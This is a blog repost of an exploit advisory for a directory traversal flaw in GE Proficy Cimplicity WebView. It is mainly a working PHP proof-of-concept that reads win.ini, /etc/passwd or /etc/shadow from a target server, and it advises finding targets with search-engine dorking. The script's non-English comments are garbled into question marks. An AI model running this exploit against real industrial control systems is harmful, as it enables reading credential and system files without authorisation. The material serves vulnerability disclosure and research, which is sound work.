Latest Tech

Latest Posts

GE Proficy Cimplicity 7.5 Directory Traversal

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 298
GE Proficy Cimplicity 7.5 Directory Traversal
GE Proficy Cimplicity 7.5 Directory Traversal
=============================================================================================================================================
| # Title : GE Proficy =============================================================================================================================================
| # Title : GE Proficy Cimplicity 7.5 Directory Traversal Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.alliedsolutions.com.vn/products/proficy-cimplicity/ |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description: This script is written in PHP to simulate the exploitation of the Directory Traversal vulnerability in GE Proficy Cimplicity WebView, which allows sensitive files on the targeted server to be read.

(Related : https://packetstorm.news/files/id/180783/ Linked CVE numbers: CVE-2013-0653 ) .

[+] save code as poc.php.

[+] Set target : line 3

[+] PayLoad :

<?php
// ??????? ?????????
$target = "http://192.168.1.100:80"; // ????? ?????
$target_uri = "/CimWeb/gefebt.exe";
$depth = 5; // ??? ??????? ???????

// ?????? ????? ????? ??? ???? ??????? ????????
$os = "windows"; // ???? ?????? ??? linux ?? macos ?? unix

switch (strtolower($os)) {
case "windows":
$filepath = "/windows/win.ini";
break;
case "linux":
$filepath = "/etc/passwd";
break;
case "macos":
$filepath = "/etc/passwd";
break;
case "unix":
$filepath = "/etc/shadow";
break;
default:
die("???? ??????? ??? ?????!\n");
}

// ????? ?????? ?????? ?????????
$traversal = str_repeat("../", $depth) . $filepath;
$url = "{$target}{$target_uri}?substitute.bcl+FILE=" . urlencode($traversal);

echo "[+] ?????? ??????? ?????: {$filepath}\n";

// ????? ?????
$response = @file_get_contents($url);

if ($response === false) {
die("[-] ??? ?? ??????? ?????!\n");
}

// ??? ??????? ?? ???
$file_name = basename($filepath);
file_put_contents($file_name, $response);

echo "[+] ?? ??? ????? ??: {$file_name}\n";
?>




Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

Information Security

Social Media Share
About Contact Terms of Use Privacy Policy
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸
All content is for educational purposes only. Unauthorized use of any information on this site is strictly prohibited.